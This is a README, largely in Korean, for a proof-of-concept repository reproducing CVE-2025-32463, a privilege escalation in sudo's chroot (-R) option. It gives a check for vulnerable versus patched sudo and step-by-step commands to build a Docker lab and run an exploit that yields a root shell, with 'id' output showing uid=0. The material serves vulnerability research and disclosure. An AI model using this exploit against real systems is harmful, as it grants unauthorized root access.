
C reimplementation of chwoot PoC
이 저장소는 sudo의 chroot 기능에서 CVE‑2025‑32463 권한 상승 결함을 입증하기 위한 최소한의 재현 가능 환경을 제공합니다.
대부분의 Linux 배포판에서 sudo 1.9.14부터 1.9.17(모든 p‑revision)까지의 취약한 빌드가 영향을 받습니다.
보안 페이지
| 파일 | 용도 |
|---|---|
| Dockerfile | 취약한 sudo 1.9.16p2와 빌드 도구가 포함된 Ubuntu 24.04 이미지를 빌드합니다 |
| sudo‑chwoot.sh | chroot 내부에서 루트 셸을 실행하는 개념 증명 익스플로잇 |
| run.sh | 이미지를 빌드하고(필요한 경우) 익스플로잇 컨테이너를 실행하는 도우미 스크립트 |
# Vulnerable sudo
poc ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
poc ~ $ sudo -R woot woot
[sudo] password for poc:
sudo: you are not permitted to use the -R option with woot
# 1 – clone repo
$ git clone https://github.com/vpr-labs/CVE-2025-32463.git
$ cd CVE-2025-32463
# 2 – build and run Docker image (tagged "vpr-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly)
poc@f722d9182d1f:~$ make && ./vpr-chwoot
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(poc)
root@f722d9182d1f:/#
run.sh는 Docker에 --privileged와 --rm을 전달하여 컨테이너를 종료할 때 자동으로 정리되도록 합니다.
작업이 끝나면 이미지를 제거하세요:
docker rmi vpr-chwoot